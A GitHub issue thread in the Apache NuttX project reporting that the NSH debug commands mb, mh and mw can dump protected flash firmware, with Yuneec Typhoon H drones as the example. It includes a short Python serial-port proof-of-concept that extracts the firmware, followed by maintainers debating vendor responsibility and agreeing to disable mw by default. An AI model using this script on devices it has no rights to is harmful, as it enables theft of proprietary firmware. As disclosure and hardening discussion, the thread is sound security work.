apache/nuttx #3011: Nsh Debug Commands Vulnerability Report

swkim101, 2021-03-09:
## Nsh's `mb`, `mh`, and `mw` commands can leak intellectual property.

Exploiting those commands makes it possible to extract firmware from the flash memory because `mb`, `mh`, and `mw` can read the firmware code at an arbitrary location.
You may know that some commercial vendors can customize their firmware without opening even binary code.
However, those commands can neutralize the intellectual protection scheme to prevent from reading binary firmware code.

We found this issue on [Yuneec](https://us.yuneec.com/), a commercial drone vendor, which has sold multiple drone models such as Typhoon H. 
This drone vendor has made efforts to protect its firmware from reading out, applying [ST's hardware read protection](https://www.st.com/resource/en/application_note/dm00186528-proprietary-code-read-out-protection-on-microcontrollers-of-the-stm32f4-series-stmicroelectronics.pdf) to its drones.   
Nevertheless, the `mb 0x8000000` command naively prints Typhoon H's firmware binary code, bypassing the protection scheme.

PoC is as follows:

```python
import serial
ser = serial.Serial(
   port='COM7',\
   baudrate=57600,\
   parity=serial.PARITY_NONE,\
   stopbits=serial.STOPBITS_ONE,\
   bytesize=serial.EIGHTBITS,\
   timeout=0)
f = open('output_db000.txt', 'wb')
for addr in range(0x080db000, 0x08200000, 0x1000):
   count = 0
   ser.write(b'mw ')
   ser.write(bytes(hex(addr), 'ascii'))
   ser.write(b' 1000\r\n')
   print(hex(addr))
   while True:
       line = ser.readline()
       f.write(line)
       #print(line)
   
       if(len(line) <= 5 and count != 0):
           break
       count += 1
f.close()
```

Only if possible, we believe the best way to prevent this vulnerability is to remove mb, mh, and mw commands.  
If that is not allowed due to debugging purpose, we would like to suggest the following actions can help protect intellectual properties from this vulnerability:  
(1) please add comments in the source code.  
(2) please show warnings in compile messages.  
(3) please disable those commands in the default configuration (`CONFIG_NSH_DISABLE_MW=y`)

btashton, 2021-03-09:
I don't see any reason to make these changes. It's up to the vendor to harden the interfaces as they wish. This really is no different than other embedded shells like uboot. Removing these specific commands leaves many other paths to accomplish the same thing with slightly more work.

Also the firmware readout protection on the STM32F4 is very broken.

gustavonihei, 2021-03-09:
Every OS provides debug features that, if kept enabled on the final product, may end up compromising its security. But I agree with @btashton, its the vendor responsibility to perform the security assessment of its product and disable these interfaces.

Although, I confess I didn't know these NSH commands existed, maybe because there are so many commands and I've never gone through each of them.

Maybe we could modify the option names in the `Disable Individual commands` menu from Menuconfig to clarify their behavior. For example: "Disable move byte command (mb)" or "Disable mb (move byte)". This is a simple change that may improve the menuconfig experience and also help to catch the developer's eye that it is indeed a memory manipulation tool and has security implications.

davids5, 2021-03-09:
>  I agree with @btashton, its the vendor responsibility to perform the security assessment of its product and disable these interfaces.

100% !

2 sayings come to mind. 1) The devil is in the details. 2) Details matter.  The config was locked down.  What happened? I would assume inexperienced personal did an upgrade and did not look scrutinize the diff.  No amount of documentations will fix that.

saramonteiro, 2021-03-09:
I also agree that vendors should disable it in a product version.
However, thanks  @swkim101  for reporting it and be encouraged to report potential vulnerabilities whenever you feel so. 
I am sure at least it brought attention for users and will turn into a more "checklist item" before releasing applications. (At least to me).

patacongo, 2021-03-09:
I don't generally find these commands useful very often.  But when needed they are nice to have.

These are controlled by configuration options CONFIG_NSH_DISABLE_MH, CONFIG_NSH_DISABLE_MB, and CONFIG_NSH_DISABLE_MW.  The default value is 'n' meaning enabled (not disabled).

I think that changing the default to 'y' (disabled) might be a good idea especially since the commands are not usually useful.  Perrhaps adding some comments to the Kconfig file would be good too.

The FLAT build mode was never intended to be secure.  Anyone who is using the FLAT build mode has opened their system up to anyone who has physical possession of the hardware.  Changing these commands does not provide any additional security.

If you want better security, then you should be using the PROTECTED mode when does give you security even if someone has possession of the hardware (at least provided that the hardware provides proper FLASH security).  PROTECTED mode is the solution for security; FLAT is for no security but simpler logic.

NOTE 1:  In protected mode, the MB, MH, and MW commands *cannot* be used to peek into secure kernel memory.  If you attempt that in the PROTECTED build, you will get a memory fault.  You can still look at memory inside the unprotected application blob (which is almost never useful).

NOTE 2:  There are a few security holes known in PROTECTED mode as well.  These are all documented as Issues tagged with "Security"

acassis, 2021-03-09:
I also agree to change it to be disabled by default! A good side-effect will be removing some bytes from the final firmware as well!

+1 for disabling it by default!

acassis, 2021-03-09:
Anyway, if Yuneec released a drone with proprietary_code/intellectual_property they should have contracted some company to do so Penetration Test, the fault is very basic. @swkim101 what is the proprietary doing on their drone? Is it something really critical? Is it possible to use their drone without it?

swkim101, 2021-03-10:
There is obviously a lack of information regarding the potential vulnerability of those commands.
It is difficult to notice this vulnerability without any documentation.

I mailed this to Yuneec and will share what they will do.

btashton, 2021-03-10:
I think one of the biggest reasons that I don't see this as a big deal is that I see the nsh shell as very similar to the uboot shell. The uboot shell offers these all by default.

While you certainly can try to offer the shell and lock down firmware access, you have given up a lot at that point.  You really should be looking at using a MPU to provide the extra isolation as Greg mentioned but that does not exist for many of these chips. 

https://www.denx.de/wiki/U-Bootdoc/BasicCommandSet

These days I think most people focus on things like firmware signing for integrity over trying to prevent dumping. There are very few chips that cannot be dumped these days, even many of the ones that support encrypted firmware have had that broken.

hartmannathan, 2021-03-12:
Unless there is a reason why the final product should have NSH, for example if user interaction through NSH is a valid use case, then the vendor might consider removing NSH from their build entirely.

nix7965, 2021-03-12:
I would suggest we may need to disable "mw"-like commands as @patacongo mentioned at default because it does not look like such useful....
Also, I have the following opinions.

1.  I think "firmware extraction permission" != "NSH access". 
If there was no "mw" command, firmware extraction is not possible.
Meanwhile @btashton said that STM32F4's readout protection is very broken (I assume you mean we can disable STM32F4's readout **without any problem such as no original firmware erasure**).
But, I remember there is no practical way to do that.... Sorry for my ignorance. Could you tell me how to do that? 
Even if that is really very broken, that does not mean we should not protect against this vulnerability. 
Because this can happen on other "unbroken" boards, I think we should make it more secure.

     Again, NSH access itself is not firmware extraction permission. Additionally, if applications running on NSH are properly implemented, NSH may not cause serious security issues IMO.

2. Second, @patacongo mentioned PROTECTED mode. But, I think NuttX is open source. Therefore, I guess what the vendors really protect (to prevent extraction) is their "application code" in general. In that case, I guess "mw" commands work for "application code". If my understanding is correct, please let me know. That's good to learn.

patacongo, 2021-03-12:
> I would suggest we may need to disable "mw"-like commands as 
> @patacongo <https://github.com/patacongo> mentioned at default because 
> it does not look like such useful....
>
I have found the 'mw' command very useful during board bring-up. It is 
sometimes a very convenient way to get a device working by reading and 
writing registers directory.  It has been very helpful to me on occasions.

But beyond the initial bring-up in a buckled up, production system it is 
not so useful.  But we can say that about NSH in general.

btashton, 2021-03-12:
> I would suggest we may need to disable "mw"-like commands as @patacongo mentioned at default because it does not look like such useful....
> Also, I have the following opinions.
> 
> 1.  I think "NSH access permission" != "firmware extraction permission (or allowing firmware extraction)". 
> If there was no "mw" command, firmware extraction is not possible.
> Meanwhile @btashton said that STM32F4's readout protection is very broken (I assume you mean we can disable STM32F4's readout **w/o any problem**.).
> But, I remember there is no practical way to do that.... Sorry for my ignorance. Could you tell me how to do that? 
> Even if that is really very broken, that does not mean we should not protect against this vulnerability. 
> Because this can happen on other "unbroken" boards, I think we should make it more secure.
> 
>      Again, NSH access itself is not firmware extraction permission. Additionally, if applications running on NSH are properly implemented, NSH may not cause unexpected security issues such firmware extraction (I note that vendor deployed readout protection to protect their firmware contents).
> 

Sure here is a recent write-up on how this was done to trivially bypass all the protection. My point here is more of a philosophical one that firmware protection is most hardware ranges from very broken to hard to break. And very little requires going to decaping chips. Some security focused chips fall much closer to the very hard end of the spectrum. So the focus should be more on preventing unauthorized firmware than trying to hide IP.

https://blog.kraken.com/post/3662/kraken-identifies-critical-flaw-in-trezor-hardware-wallets/

> 2. Second, @patacongo mentioned PROTECTED mode. But, I think NuttX is open source. Therefore, I guess what the vendors really protect is their **"application code from the firmware extraction"**. In that case, I guess "mw" commands work for "application code". If my understanding is incorrect, please let me know. That's good to learn.

If you are operating in flat mode there are so many possibilities.  If they had the ability to load and elf you could simply copy the mw or mr binaries over and execute them.

Some devices have block devices and you could simply use cat or dd to write out that device.

This is why for any device it is important to be able to understand your security posture and make sure you evaluate it. Running ? in the nsh shell and making sure you know what is there is a low bar.

This all said while I don't buy the security argument here, I also don't feel opposed to making these non default, I'm just not going to submit the PR.

xiaoxiang781216, 2021-03-28:
The community at least agree to disable mw by default from Kconfig, @swkim101 you can provide a patch for this.

closed 2021-03-28 by xiaoxiang781216